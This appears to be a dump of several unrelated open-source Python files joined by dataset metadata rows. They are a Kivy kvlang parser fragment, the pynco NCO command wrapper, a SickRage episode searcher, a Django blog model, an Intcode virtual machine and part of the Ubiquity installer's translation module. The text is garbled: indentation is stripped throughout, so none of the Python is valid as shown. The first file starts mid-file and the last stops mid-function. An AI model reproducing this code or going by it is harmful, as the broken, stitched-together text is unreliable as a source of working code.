from kvlang.kvTree import DirectiveNode, WidgetNode, WidgetLikeNode, PropertyNode, CanvasNode, InstructionNode
class ParserRule(kivy_ParserRule):
__slots__ = ('ast_node', '__weakref__')
def load_ast(self, ast, **kwargs):
kwargs.setdefault('rulesonly', False)
self._current_filename = fn = kwargs.get('filename', None)
if fn in self.files:
Logger.warning(
'kvlang: The file {} is loaded multiple times, '
'you might have unwanted behaviors.'.format(fn))
try:
parser = ASTParser(ast=ast)
self.rules.extend(parser.rules)
self._clear_matchcache()
for name, cls, template in parser.templates:
self.templates[name] = (cls, template, fn)
Factory.register(name, cls=partial(self.template, name), is_template=True)
for name, baseclasses in iteritems(parser.dynamic_classes):
Factory.register(name, baseclasses=baseclasses, filename=fn)
if kwargs['rulesonly'] and parser.root:
filename = kwargs.get('rulesonly', '<string>')
raise Exception('The file <%s> contains also non-rules '
'directives' % filename)
if fn and (parser.templates or
parser.dynamic_classes or parser.rules):
self.files.append(fn)
if parser.root:
widget = Factory.get(parser.root.name)()
self._apply_rule(widget, parser.root, parser.root)
return widget
finally:
self._current_filename = None
Builder_apply_rule = kivy_Builder._apply_rule
def _apply_rule(self, widget, rule, *args, **kwargs):
Builder_apply_rule(widget, rule, *args, **kwargs)
if hasattr(rule, 'ast_node'):
widget.ast_node = rule.ast_node
widget.ast_node.ast_widget = widget.proxy_ref
kivy_Builder._apply_rule = partial(_apply_rule, kivy_Builder)
class ASTParser(Parser):
def __init__(self, **kwargs):
self.ast = kwargs.get('ast', None)
if self.ast is None:
raise ValueError('No AST passed')
kwargs['content'] = self.ast
super(ASTParser, self).__init__(**kwargs)
def execute_directives(self):
for directive in self.ast.find_all(DirectiveNode):
self.directives.append((directive.token.line,
str(directive).strip()[2:]))
super(ASTParser, self).execute_directives()
def parse(self, ast):
lines = ast.source.splitlines()
if not lines:
return
num_lines = len(lines)
lines = list(zip(list(range(num_lines)), lines))
self.sourcecode = lines[:]
self.execute_directives()
rules = self.parse_tree(ast.tree)
for rule in rules:
rule.precompile()
def parse_tree(self, root):
if not root:
return []
nodes = root.children if root.isNil() else [root]
return self.parse_nodes(nodes)
def parse_nodes(self, nodes, level=0):
objects = []
for node in [n for n in nodes if isinstance(n, WidgetLikeNode)]:
ln = node.get_sourceline()
name = str(node)
if (level != 0
and name not in self.PROP_ALLOWED
and any(ord(z) not in self.PROP_RANGE for z in name)):
raise ParserException(self, ln, 'Invalid class name')
current_object = ParserRule(self, ln, name, level)
objects.append(current_object)
node.ast_rule = weakref.proxy(current_object)
current_object.ast_node = weakref.proxy(node)
for child in node.interesting_children():
if isinstance(child, PropertyNode):
name = child.name
value = child.parsevalue
if name == 'id':
if len(value) == 0:
raise ParserException(self, ln, 'Empty id')
if value in ('self', 'root'):
raise ParserException(self, ln,
'Invalid id, cannot be "self" or "root"')
current_object.id = value
elif len(value):
rule = ParserRuleProperty(self, ln, name, value)
if name[:3] == 'on_':
current_object.handlers.append(rule)
else:
current_object.properties[name] = rule
elif isinstance(child, CanvasNode):
canvas = self.parse_nodes([child], level + 2)
setattr(current_object, child.canvas_object, canvas[0])
elif isinstance(child, (WidgetNode, InstructionNode)):
children = self.parse_nodes([child], level + 1)
children_set = getattr(current_object, 'children', [])
children_set += children
current_object.children = children_set
return objects
| mit | -200,474,541,999,551,460 | 29.835616 | 121 | 0.677477 | false |
nco/pynco | nco/nco.py | 1 | 19238 | """
nco module. Use Nco class as interface.
"""
import distutils.spawn
import os
import re
import shlex
import six
import subprocess
import tempfile
from distutils.version import LooseVersion
class NCOException(Exception):
def __init__(self, stdout, stderr, returncode):
super(NCOException, self).__init__()
self.stdout = stdout
self.stderr = stderr
self.returncode = returncode
self.msg = "(returncode:{0}) {1}".format(returncode, stderr)
def __str__(self):
return self.msg
class Nco(object):
def __init__(
self,
returnCdf=False,
return_none_on_error=False,
force_output=True,
cdf_module="netcdf4",
debug=0,
**kwargs
):
operators = [
"ncap2",
"ncatted",
"ncbo",
"nces",
"ncecat",
"ncflint",
"ncks",
"ncpdq",
"ncra",
"ncrcat",
"ncrename",
"ncwa",
"ncea",
]
if "NCOpath" in os.environ:
self.nco_path = os.environ["NCOpath"]
else:
self.nco_path = os.path.split(distutils.spawn.find_executable("ncks"))[0]
self.operators = operators
self.return_cdf = returnCdf
self.return_none_on_error = return_none_on_error
self.force_output = force_output
self.cdf_module = cdf_module
self.debug = debug
self.outputOperatorsPattern = [
"-H",
"--data",
"--hieronymus",
"-M",
"--Mtd",
"--Metadata",
"-m",
"--mtd",
"--metadata",
"-P",
"--prn",
"--print",
"-r",
"--revision",
"--vrs",
"--version",
"--u",
"--units",
]
self.OverwriteOperatorsPattern = ["-O", "--ovr", "--overwrite"]
self.AppendOperatorsPattern = ["-A", "--apn", "--append"]
# operators that can function with a single file
self.SingleFileOperatorsPattern = ["ncap2" , "ncatted", "ncks", "ncrename"]
self.DontForcePattern = (
self.outputOperatorsPattern
+ self.OverwriteOperatorsPattern
+ self.AppendOperatorsPattern
)
# I/O from call
self.returncode = 0
self.stdout = ""
self.stderr = ""
if kwargs:
self.options = kwargs
else:
self.options = None
def __dir__(self):
res = dir(type(self)) + list(self.__dict__.keys())
res.extend(self.operators)
return res
def call(self, cmd, inputs=None, environment=None, use_shell=False):
inline_cmd = cmd
if inputs is not None:
if isinstance(inputs, str):
inline_cmd.append(inputs)
else:
# assume it's an iterable
inline_cmd.extend(inputs)
if self.debug:
print("# DEBUG ==================================================")
if environment:
for key, val in list(environment.items()):
print("# DEBUG: ENV: {0} = {1}".format(key, val))
print("# DEBUG: CALL>> {0}".format(" ".join(inline_cmd)))
print("# DEBUG ==================================================")
# if we're using the shell then we need to pass a single string as the command rather than in iterable
if use_shell:
inline_cmd = " ".join(inline_cmd)
try:
proc = subprocess.Popen(
inline_cmd,
shell=use_shell,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
except OSError:
# Argument list may have been too long, so don't use a shell
proc = subprocess.Popen(
inline_cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=environment,
)
retvals = proc.communicate()
return {
"stdout": retvals[0],
"stderr": retvals[1],
"returncode": proc.returncode,
}
def has_error(self, method_name, inputs, cmd, retvals):
if self.debug:
print(
"# DEBUG: RETURNCODE: {return_code}".format(
return_code=retvals["returncode"]
)
)
if retvals["returncode"] != 0:
print("Error in calling operator {method} with:".format(method=method_name))
print(">>> {command} <<<".format(command=" ".join(cmd)))
print("Inputs: {0!s}".format(inputs))
print(retvals["stderr"])
return True
else:
return False
def __getattr__(self, nco_command):
# shortcut to avoid calling auto_doc decorator if command doesn't exist
if nco_command not in self.operators:
raise AttributeError("Unknown command: {cmd}".format(cmd=nco_command))
# first run the auto_doc decorator, which runs the command with --help option, in order to pull in usage info
@auto_doc(nco_command, self)
def get(self, input, **kwargs):
"""
This is the function that's called when this __getattr__ "magic" function runs.
Parses options and constructs/calls an appropriate/corresponding NCO command.
:param self:
:param input:
:param kwargs:
:return:
"""
options = kwargs.pop("options", [])
force = kwargs.pop("force", self.force_output)
output = kwargs.pop("output", None)
environment = kwargs.pop("env", None)
debug = kwargs.pop("debug", self.debug)
return_cdf = kwargs.pop("returnCdf", False)
return_array = kwargs.pop("returnArray", False)
return_ma_array = kwargs.pop("returnMaArray", False)
operator_prints_out = kwargs.pop("operator_prints_out", False)
use_shell = kwargs.pop("use_shell", True)
# build the NCO command
# 1. the NCO operator
cmd = [os.path.join(self.nco_path, nco_command)]
if options:
for option in options:
if isinstance(option, str):
cmd.extend(str.split(option))
elif hasattr(option,"prn_option"):
cmd.extend(option.prn_option().split())
else:
# assume it's an iterable
cmd.extend(option)
if debug:
if type(debug) == bool:
# assume debug level is 3
cmd.append("--nco_dbg_lvl=3")
elif type(debug) == int:
cmd.append("--nco_dbg_lvl={0}".format(debug))
else:
raise TypeError(
"Unknown type for debug: \
{0}".format(
type(debug)
)
)
if output and force and os.path.isfile(output):
# make sure overwrite is set
if debug:
print("Overwriting file: {0}".format(output))
if any([i for i in cmd if i in self.DontForcePattern]):
force = False
else:
force = False
# 2b. all other keyword args become options
if kwargs:
for key, val in list(kwargs.items()):
if val and type(val) == bool:
cmd.append("--{0}".format(key))
if cmd[-1] in self.DontForcePattern:
force = False
elif (
isinstance(val, str)
or isinstance(val, int)
or isinstance(val, float)
):
cmd.append("--{option}={value}".format(option=key, value=val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append(
"--{option}={values}".format(
option=key, values=",".join(val)
)
)
# 2c. Global options come in
if self.options:
for key, val in list(self.options.items()):
if val and type(val) == bool:
cmd.append("--" + key)
elif isinstance(val, str):
cmd.append("--{0}={1}".format(key, val))
else:
# we assume it's either a list, a tuple or any iterable
cmd.append("--{0}={1}".format(key, ",".join(val)))
# 3. Add in overwrite if necessary
if force:
cmd.append("--overwrite")
# Check if operator appends
operator_appends = False
for piece in cmd:
if piece in self.AppendOperatorsPattern:
operator_appends = True
# If operator appends and NCO version >= 4.3.7, remove -H -M -m
# and their ancillaries from outputOperatorsPattern
if operator_appends and nco_command == "ncks":
nco_version = self.version()
if LooseVersion(nco_version) >= LooseVersion("4.3.7"):
self.outputOperatorsPattern = [
"-r",
"--revision",
"--vrs",
"--version",
]
# Check if operator prints out
for piece in cmd:
if piece in self.outputOperatorsPattern:
operator_prints_out = True
if operator_prints_out:
retvals = self.call(cmd, inputs=input)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if not self.has_error(nco_command, input, cmd, retvals):
return retvals["stdout"]
# parsing can be done by 3rd party
else:
if self.return_none_on_error:
return None
else:
raise NCOException(**retvals)
else:
if output is not None:
if isinstance(output, str):
cmd.append("--output={0}".format(output))
else:
# we assume it's an iterable.
if len(output) > 1:
raise TypeError(
"Only one output allowed, must be string or 1 length iterable. "
"Recieved output: {out} with a type of {type}".format(
out=output, type=type(output)
)
)
cmd.extend("--output={0}".format(output))
elif not (nco_command in self.SingleFileOperatorsPattern):
# create a temporary file, use this as the output
file_name_prefix = nco_command + "_" + input.split(os.sep)[-1]
tmp_file = tempfile.NamedTemporaryFile(
mode="w+b", prefix=file_name_prefix, suffix=".tmp", delete=False
)
output = tmp_file.name
cmd.append("--output={0}".format(output))
retvals = self.call(
cmd, inputs=input, environment=environment, use_shell=use_shell
)
self.returncode = retvals["returncode"]
self.stdout = retvals["stdout"]
self.stderr = retvals["stderr"]
if self.has_error(nco_command, input, cmd, retvals):
if self.return_none_on_error:
return None
else:
print(self.stdout)
print(self.stderr)
raise NCOException(**retvals)
if return_array:
return self.read_array(output, return_array)
elif return_ma_array:
return self.read_ma_array(output, return_ma_array)
elif self.return_cdf or return_cdf:
if not self.return_cdf:
self.load_cdf_module()
return self.read_cdf(output)
else:
return output
if (nco_command in self.__dict__) or (nco_command in self.operators):
if self.debug:
print("Found method: {0}".format(nco_command))
# cache the method for later
setattr(self.__class__, nco_command, get)
return get.__get__(self)
else:
# If the method isn't in our dictionary, act normal.
print("#=====================================================")
print("Cannot find method: {0}".format(nco_command))
raise AttributeError("Unknown method {0}!".format(nco_command))
def load_cdf_module(self):
if self.cdf_module == "netcdf4":
try:
import netCDF4 as cdf
self.cdf = cdf
except Exception:
raise ImportError(
"Could not load python-netcdf4 - try to "
"setting 'cdf_module='scipy'"
)
elif self.cdf_module == "scipy":
try:
import scipy.io.netcdf as cdf
self.cdf = cdf
except Exception:
raise ImportError(
"Could not load scipy.io.netcdf - try to "
"setting 'cdf_module='netcdf4'"
)
else:
raise ValueError(
"Unknown value provided for cdf_module. Valid "
"values are 'scipy' and 'netcdf4'"
)
def set_return_array(self, value=True):
self.returnCdf = value
if value:
self.load_cdf_module()
def unset_return_array(self):
self.set_return_array(False)
def has_nco(self, path=None):
if path is None:
path = self.nco_path
if os.path.isdir(path) and os.access(path, os.X_OK):
return True
else:
return False
def check_nco(self):
if self.has_nco():
call = [os.path.join(self.nco_path, "ncra"), "--version"]
proc = subprocess.Popen(
" ".join(call), stderr=subprocess.PIPE, stdout=subprocess.PIPE
)
retvals = proc.communicate()
print(retvals)
def set_nco_path(self, value):
self.nco_path = value
def get_nco_path(self):
return self.nco_path
# ==================================================================
# Additional operators:
# ------------------------------------------------------------------
@property
def module_version(self):
return "0.0.0"
def version(self):
# return NCO's version
proc = subprocess.Popen(
[os.path.join(self.nco_path, "ncra"), "--version"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
)
ret = proc.communicate()
ncra_help = ret[1]
if isinstance(ncra_help, bytes):
ncra_help = ncra_help.decode("utf-8")
match = re.search(r"NCO netCDF Operators version (\d.*) ", ncra_help)
# some versions write version information in quotation marks
if not match:
match = re.search(r'NCO netCDF Operators version "(\d.*)" ', ncra_help)
return match.group(1).split(" ")[0]
def read_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
python-netcdf4 and scipy supported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
file_obj = self.cdf.netcdf_file(infile, mode="r")
elif self.cdf_module == "netcdf4":
file_obj = self.cdf.Dataset(infile)
else:
raise ImportError(
"Could not import data \
from file {0}".format(
infile
)
)
return file_obj
def open_cdf(self, infile):
"""Return a cdf handle created by the available cdf library.
python-netcdf4 and scipy suported (default:scipy)"""
if not self.return_cdf:
self.load_cdf_module()
if self.cdf_module == "scipy":
# making it compatible to older scipy versions
print("Use scipy")
file_obj = self.cdf.netcdf_file(infile, mode="r+")
elif self.cdf_module == "netcdf4":
print("Use netcdf4")
file_obj = self.cdf.Dataset(infile, "r+")
else:
raise ImportError(
"Could not import data \
from file: {0}".format(
infile
)
)
return file_obj
def read_array(self, infile, var_name):
"""Directly return a numpy array for a given variable name"""
file_handle = self.read_cdf(infile)
try:
# return the data array
return file_handle.variables[var_name][:]
except KeyError:
print("Cannot find variable: {0}".format(var_name))
raise KeyError
def read_ma_array(self, infile, var_name):
"""Create a masked array based on cdf's FillValue"""
file_obj = self.read_cdf(infile)
# .data is not backwards compatible to old scipy versions, [:] is
data = file_obj.variables[var_name][:]
# load numpy if available
try:
import numpy as np
except Exception:
raise ImportError("numpy is required to return masked arrays.")
if hasattr(file_obj.variables[var_name], "_FillValue"):
# return masked array
fill_val = file_obj.variables[var_name]._FillValue
retval = np.ma.masked_where(data == fill_val, data)
else:
# generate dummy mask which is always valid
retval = np.ma.array(data)
return retval
def auto_doc(tool, nco_self):
"""
Generate the __doc__ string of the decorated function by calling the nco help command
:param tool:
:param nco_self:
:return:
"""
def desc(func):
func.__doc__ = nco_self.call([tool, "--help"]).get("stdout")
return func
return desc
| mit | -416,057,038,847,101,900 | 34.429098 | 117 | 0.477025 | false |
CristianBB/SickRage | sickbeard/dailysearcher.py | 1 | 4268 | # Author: Nic Wolfe <[email protected]>
# URL: https://sickrage.github.io
# Git: https://github.com/SickRage/SickRage.git
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import datetime
import threading
import sickbeard
from sickbeard import logger
from sickbeard import db
from sickbeard import common
from sickbeard import network_timezones
from sickrage.show.Show import Show
from sickrage.helper.exceptions import MultipleShowObjectsException
class DailySearcher():
def __init__(self):
self.lock = threading.Lock()
self.amActive = False
def run(self, force=False):
"""
Runs the daily searcher, queuing selected episodes for search
:param force: Force search
"""
if self.amActive:
return
self.amActive = True
logger.log(u"Searching for new released episodes ...")
if not network_timezones.network_dict:
network_timezones.update_network_dict()
if network_timezones.network_dict:
curDate = (datetime.date.today() + datetime.timedelta(days=1)).toordinal()
else:
curDate = (datetime.date.today() + datetime.timedelta(days=2)).toordinal()
curTime = datetime.datetime.now(network_timezones.sb_timezone)
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE status = ? AND season > 0 AND (airdate <= ? and airdate > 1)",
[common.UNAIRED, curDate])
sql_l = []
show = None
for sqlEp in sqlResults:
try:
if not show or int(sqlEp["showid"]) != show.indexerid:
show = Show.find(sickbeard.showList, int(sqlEp["showid"]))
# for when there is orphaned series in the database but not loaded into our showlist
if not show or show.paused:
continue
except MultipleShowObjectsException:
logger.log(u"ERROR: expected to find a single show matching " + str(sqlEp['showid']))
continue
if show.airs and show.network:
# This is how you assure it is always converted to local time
air_time = network_timezones.parse_date_time(sqlEp['airdate'], show.airs, show.network).astimezone(network_timezones.sb_timezone)
# filter out any episodes that haven't started airing yet,
# but set them to the default status while they are airing
# so they are snatched faster
if air_time > curTime:
continue
ep = show.getEpisode(int(sqlEp["season"]), int(sqlEp["episode"]))
with ep.lock:
if ep.season == 0:
logger.log(u"New episode " + ep.prettyName() + " airs today, setting status to SKIPPED because is a special season")
ep.status = common.SKIPPED
else:
logger.log(u"New episode %s airs today, setting to default episode status for this show: %s" % (ep.prettyName(), common.statusStrings[ep.show.default_ep_status]))
ep.status = ep.show.default_ep_status
sql_l.append(ep.get_sql())
if len(sql_l) > 0:
myDB = db.DBConnection()
myDB.mass_action(sql_l)
else:
logger.log(u"No new released episodes found ...")
# queue episode for daily search
dailysearch_queue_item = sickbeard.search_queue.DailySearchQueueItem()
sickbeard.searchQueueScheduler.action.add_item(dailysearch_queue_item)
self.amActive = False
| gpl-3.0 | -8,188,740,517,060,104,000 | 37.45045 | 182 | 0.626992 | false |
aileron-split/aileron-web | server/blog/models.py | 1 | 1104 | from django.db import models
# Blog app models.
class Post(models.Model):
published = models.BooleanField(default=False)
published_date = models.DateTimeField(null=True, blank=True)
slug = models.SlugField(max_length=80)
title = models.CharField(max_length=80, default='Post Title')
subtitle = models.CharField(max_length=200, null=True, blank=True)
summary = models.TextField(default='Post summary.')
content = models.TextField(default='Post content.')
card_sm_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_mat_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
card_lg_image = models.ImageField(upload_to='images/cards/', null=True, blank=True)
video = models.URLField(null=True, blank=True)
album = models.ForeignKey('gallery.Album', blank=True, null=True)
author = models.ForeignKey('team.Member', blank=True, null=True)
created_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
| gpl-3.0 | 2,635,139,199,670,405,000 | 47 | 88 | 0.71558 | false |
BrendanLeber/adventofcode | 2019/09-sensor_boost/intcode.py | 1 | 7073 | # -*- coding: utf-8 -*-
import pdb
import sys
import traceback
from collections import deque
from enum import IntEnum
from typing import Deque, Dict, List, NamedTuple, Optional, Tuple, Union
class ParameterMode(IntEnum):
POSITIONAL = 0
IMMEDIATE = 1
RELATIVE = 2
class ParameterType(IntEnum):
READ = 0
WRITE = 1
class InstructionInfo(NamedTuple):
name: str
params: Tuple[ParameterType, ...]
INSTRUCTIONS: Dict[int, InstructionInfo] = {
1: InstructionInfo("add", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
2: InstructionInfo("mul", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
3: InstructionInfo("in", (ParameterType.WRITE,)),
4: InstructionInfo("out", (ParameterType.READ,)),
5: InstructionInfo("jnz", (ParameterType.READ, ParameterType.READ)),
6: InstructionInfo("jz", (ParameterType.READ, ParameterType.READ)),
7: InstructionInfo("lt", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
8: InstructionInfo("eq", (ParameterType.READ, ParameterType.READ, ParameterType.WRITE)),
9: InstructionInfo("rbo", (ParameterType.READ,)),
99: InstructionInfo("halt", tuple()),
}
class Intcode:
def __init__(self, program: List[int]) -> None:
self.ip: int = 0
self.program: List[int] = program[:]
self.tape: List[int] = program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.relative_base: int = 0
self.last_output: Optional[int] = None
self.last_input: Optional[int] = None
self.chained_mode: bool = False
self.inputs: Deque = deque()
# self.execution_trace: Dict[int, str] = {}
def _disasm(self) -> str:
addr = f"{self.ip:5}"
opcode = self.tape[self.ip] % 100
opname = INSTRUCTIONS[opcode].name
params = []
mask = 10
for pnum, ptype in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
pmode = ParameterMode((self.tape[self.ip] // mask) % 10)
if ptype == ParameterType.WRITE:
leader = "$"
elif pmode == ParameterMode.POSITIONAL:
leader = "$"
elif pmode == ParameterMode.RELATIVE:
leader = "@"
else:
leader = ""
params.append(f"{leader}{self.tape[self.ip + pnum]}")
return addr + ": " + f"{opname} " + ", ".join(params)
def decode_instruction(self) -> Tuple[int, List[int]]:
"""Decode the opcode and the arguments for this instruction."""
opcode: int = self.tape[self.ip] % 100
arguments: List[int] = []
mask: int = 10
# start at 1 to skip the opcode in the instruction
for param_num, param_type in enumerate(INSTRUCTIONS[opcode].params, 1):
mask *= 10
param_mode: ParameterMode = ParameterMode((self.tape[self.ip] // mask) % 10)
if param_type == ParameterType.WRITE:
position = self.tape[self.ip + param_num]
if param_mode == ParameterMode.RELATIVE:
position += self.relative_base
arguments.append(position)
elif param_mode == ParameterMode.POSITIONAL:
position = self.tape[self.ip + param_num]
arguments.append(self.tape[position])
elif param_mode == ParameterMode.IMMEDIATE:
arguments.append(self.tape[self.ip + param_num])
elif param_mode == ParameterMode.RELATIVE:
position = self.tape[self.ip + param_num] + self.relative_base
arguments.append(self.tape[position])
else:
raise TypeError(f"unknown parameter mode {param_mode}")
return (opcode, arguments)
def execute(self) -> Union[Optional[int], bool]:
"""Execute the instructions contained in the VM memory."""
while self.ip < len(self.program):
# self.execution_trace[self.ip] = self._disasm()
opcode, params = self.decode_instruction()
if opcode == 1:
self.tape[params[2]] = params[0] + params[1]
self.ip += 1 + len(params)
elif opcode == 2:
self.tape[params[2]] = params[0] * params[1]
self.ip += 1 + len(params)
elif opcode == 3:
if self.chained_mode and self.inputs:
value = self.inputs.popleft()
else:
value = int(input("$ "))
self.last_input = self.tape[params[0]] = value
self.ip += 1 + len(params)
elif opcode == 4:
self.last_output = params[0]
self.ip += 1 + len(params)
if self.chained_mode:
return True
else:
print(self.last_output)
elif opcode == 5:
self.ip = params[1] if params[0] else self.ip + 1 + len(params)
elif opcode == 6:
self.ip = params[1] if not params[0] else self.ip + 1 + len(params)
elif opcode == 7:
self.tape[params[2]] = 1 if params[0] < params[1] else 0
self.ip += 1 + len(params)
elif opcode == 8:
self.tape[params[2]] = 1 if params[0] == params[1] else 0
self.ip += 1 + len(params)
elif opcode == 9:
self.relative_base += params[0]
self.ip += 1 + len(params)
elif opcode == 99:
if self.chained_mode:
return False
else:
return self.last_output
raise EOFError("reached end of tape without finding halt instruction.")
def reset(self) -> None:
"""Reset the VM state before starting a new execution."""
self.tape = self.program[:]
# add extra memory space for data buffer
self.tape += [0] * max(1024, len(self.program) * 3)
self.ip = 0
self.relative_base = 0
# self.execution_trace = {}
def set_inputs(self, inputs: List[int]) -> None:
"""Set the inputs for the VM to read."""
self.inputs = deque(inputs)
def set_noun_and_verb(self, noun: int, verb: int) -> None:
"""Set the noun and verb to initialize the program."""
self.tape[1] = noun
self.tape[2] = verb
if __name__ == "__main__":
program: List[int] = []
with open(sys.argv[1]) as inf:
for line in inf:
program += list(map(int, line.strip().split(",")))
try:
vm = Intcode(program)
vm.execute()
# addrs = list(vm.execution_trace.keys())
# addrs.sort()
# for addr in addrs:
# print(f"{vm.execution_trace[addr]}")
# for ip in range(addrs[-1] + 1, len(vm.program)):
# print(f"{ip:5d}: {vm.program[ip]}")
except Exception:
traceback.print_exc()
pdb.post_mortem()
| mit | -8,612,136,722,465,389,000 | 37.862637 | 93 | 0.548565 | false |
Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/ubiquity/ubiquity/i18n.py | 1 | 12630 | # -*- coding: utf-8; Mode: Python; indent-tabs-mode: nil; tab-width: 4 -*-
# Copyright (C) 2006, 2007, 2008 Canonical Ltd.
# Written by Colin Watson <[email protected]>.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import re
import subprocess
import codecs
import os
import locale
import sys
from ubiquity import misc, im_switch
# if 'just_country' is True, only the country is changing
def reset_locale(frontend, just_country=False):
frontend.start_debconf()
di_locale = frontend.db.get('debian-installer/locale')
if not di_locale:
# TODO cjwatson 2006-07-17: maybe fetch
# languagechooser/language-name and set a language based on
# that?
di_locale = 'en_US.UTF-8'
if 'LANG' not in os.environ or di_locale != os.environ['LANG']:
os.environ['LANG'] = di_locale
os.environ['LANGUAGE'] = di_locale
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error, e:
print >>sys.stderr, 'locale.setlocale failed: %s (LANG=%s)' % \
(e, di_locale)
if not just_country:
misc.execute_root('fontconfig-voodoo',
'--auto', '--force', '--quiet')
im_switch.start_im()
return di_locale
_strip_context_re = None
def strip_context(unused_question, string):
# po-debconf context
global _strip_context_re
if _strip_context_re is None:
_strip_context_re = re.compile(r'\[\s[^\[\]]*\]$')
string = _strip_context_re.sub('', string)
return string
_translations = None
def get_translations(languages=None, core_names=[], extra_prefixes=[]):
"""Returns a dictionary {name: {language: description}} of translatable
strings.
If languages is set to a list, then only languages in that list will be
translated. If core_names is also set to a list, then any names in that
list will still be translated into all languages. If either is set, then
the dictionary returned will be built from scratch; otherwise, the last
cached version will be returned."""
global _translations
if _translations is None or languages is not None or core_names or extra_prefixes:
if languages is None:
use_langs = None
else:
use_langs = set('c')
for lang in languages:
ll_cc = lang.lower().split('.')[0]
ll = ll_cc.split('_')[0]
use_langs.add(ll_cc)
use_langs.add(ll)
prefixes = 'ubiquity|partman/text/undo_everything|partman/text/unusable|partman-basicfilesystems/bad_mountpoint|partman-basicfilesystems/text/specify_mountpoint|partman-basicmethods/text/format|partman-newworld/no_newworld|partman-partitioning|partman-target/no_root|partman-target/text/method|grub-installer/bootdev|popularity-contest/participate'
prefixes = reduce(lambda x, y: x+'|'+y, extra_prefixes, prefixes)
_translations = {}
devnull = open('/dev/null', 'w')
db = subprocess.Popen(
['debconf-copydb', 'templatedb', 'pipe',
'--config=Name:pipe', '--config=Driver:Pipe',
'--config=InFd:none',
'--pattern=^(%s)' % prefixes],
stdout=subprocess.PIPE, stderr=devnull,
# necessary?
preexec_fn=misc.regain_privileges)
question = None
descriptions = {}
fieldsplitter = re.compile(r':\s*')
for line in db.stdout:
line = line.rstrip('\n')
if ':' not in line:
if question is not None:
_translations[question] = descriptions
descriptions = {}
question = None
continue
(name, value) = fieldsplitter.split(line, 1)
if value == '':
continue
name = name.lower()
if name == 'name':
question = value
elif name.startswith('description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
descriptions[lang] = value.replace('\\n', '\n')
elif name.startswith('extended_description'):
namebits = name.split('-', 1)
if len(namebits) == 1:
lang = 'c'
else:
lang = namebits[1].lower()
# TODO: recode from specified encoding
lang = lang.split('.')[0]
if (use_langs is None or lang in use_langs or
question in core_names):
value = strip_context(question, value)
if lang not in descriptions:
descriptions[lang] = value.replace('\\n', '\n')
# TODO cjwatson 2006-09-04: a bit of a hack to get the
# description and extended description separately ...
if question in ('grub-installer/bootdev',
'partman-newworld/no_newworld',
'ubiquity/text/error_updating_installer'):
descriptions["extended:%s" % lang] = \
value.replace('\\n', '\n')
db.wait()
devnull.close()
return _translations
string_questions = {
'new_size_label': 'partman-partitioning/new_size',
'partition_create_heading_label': 'partman-partitioning/text/new',
'partition_create_type_label': 'partman-partitioning/new_partition_type',
'partition_create_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'partition_create_use_label': 'partman-target/text/method',
'partition_create_place_label': 'partman-partitioning/new_partition_place',
'partition_edit_use_label': 'partman-target/text/method',
'partition_edit_format_label': 'partman-basicmethods/text/format',
'partition_edit_mount_label': 'partman-basicfilesystems/text/specify_mountpoint',
'grub_device_dialog': 'grub-installer/bootdev',
'grub_device_label': 'grub-installer/bootdev',
# TODO: it would be nice to have a neater way to handle stock buttons
'quit': 'ubiquity/imported/quit',
'back': 'ubiquity/imported/go-back',
'cancelbutton': 'ubiquity/imported/cancel',
'exitbutton': 'ubiquity/imported/quit',
'closebutton1': 'ubiquity/imported/close',
'cancelbutton1': 'ubiquity/imported/cancel',
'okbutton1': 'ubiquity/imported/ok',
}
string_extended = set()
def map_widget_name(prefix, name):
"""Map a widget name to its translatable template."""
if prefix is None:
prefix = 'ubiquity/text'
if '/' in name:
question = name
elif name in string_questions:
question = string_questions[name]
else:
question = '%s/%s' % (prefix, name)
return question
def get_string(name, lang, prefix=None):
"""Get the translation of a single string."""
question = map_widget_name(prefix, name)
translations = get_translations()
if question not in translations:
return None
if lang is None:
lang = 'c'
else:
lang = lang.lower()
if name in string_extended:
lang = 'extended:%s' % lang
if lang in translations[question]:
text = translations[question][lang]
else:
ll_cc = lang.split('.')[0]
ll = ll_cc.split('_')[0]
if ll_cc in translations[question]:
text = translations[question][ll_cc]
elif ll in translations[question]:
text = translations[question][ll]
elif lang.startswith('extended:'):
